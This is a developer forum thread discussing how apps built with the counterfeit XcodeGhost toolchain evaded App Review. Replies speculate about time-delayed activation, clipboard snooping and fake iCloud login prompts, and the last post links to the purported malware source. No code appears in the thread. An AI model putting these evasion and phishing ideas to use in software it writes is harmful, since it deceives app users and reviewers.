How come the counterfeit Xcode malware wasn't caught by App Review?

After reading a good bit about the recent snafu of developers being tricked into using counterfeit Xcode versions that injected malware into people's apps, I have this question: How come App Review was unable to detect the malware?

It stands to reason that if we were to try to write a virus ourselves using the legitimate Xcode, of course we'd get rejected and probably wind up in worse trouble than that. I'm confident that they have the ability to detect that. But regardless of who wrote the malicious code, it's still going into an app that App Review is looking at—wouldn't it make no difference in the compiled binary?

Replies

Step back. Take a deep breath. And now think like a malicious developer who's clever enough to inject code into Xcode so that it bundles its own malware code / extension with every app being shipped. You'll find an answer to this question whilst in that thought 🙂

My limited understanding is that this malware did nothing to change the fact that apps are sandboxed on the device and didn't bypass any of the normal submission flow. All the compromised code can do is phishing attempts and inspecting the clipboard when the app is running. I'm sure the malware authors would disguise such code by not activating it until the app was through review. So app review wouldn't see anything out of the ordinary. If apps built by the compromised Xcode had included code that attempted to use private APIs, or anything else that didn't comply with review guidelines and iTC automated validation, it would not have made it into the store.

The above scenario is obviously bad. But isn't the bigger problem here developers being able to *intentionally* use their own XCode to insert malware?

I don't think we/the public know enough about the details involved beyond our own example and in my case, all of my apps are still in the store. Maybe it was caught by review/api checks and what we're hearing is a crafted response directed at users and stockholders to help ease fears. Maybe in the future we'll find out more, but right now it's all speculation, I think.

The malware was as bad as any app that has access to information running inside the sandbox. For example, it could request for contact book access and then copy / upload contacts and email address. It could potentially show a popup pretending to be from the OS asking them to enter iCloud account info and then upload it to the server (like the ones we see randomly from iOS when it wants to update something in the background and we have some app opened in the foreground). Either way, this was nothing an app already cannot do - it just did it maliciously without the developer knowing, and it probably timed it such that it starts misbehaving 'after a week' (thus escaping normal review time). Since apps already request for Contact / Address book access or other information, the malware probably just used existing permissions (including location) to gather information for advertisers, spammers and drug dealers alike.

The intentionally inserted malware was just a hypothetical example. What I was saying was that regardless of how it got into the apps, the malicious code is still present in the binary .

So you all are thinking it's some sort of time-delay system whereby the funny code would only activate, say, two weeks after the date of archive? That makes sense.


Anyway, I find it reassuring that even though someone gained unauthorized access to the App Store, Apple was still able to bring the situation under control very quickly by identifying and removing the compromised apps. Hopefully App Review will pay closer attention to this in the future (as long as review times don't skyrocket 🙂)

The code supposedly has been posted here:


https://github.com/XcodeGhostSource/XcodeGhost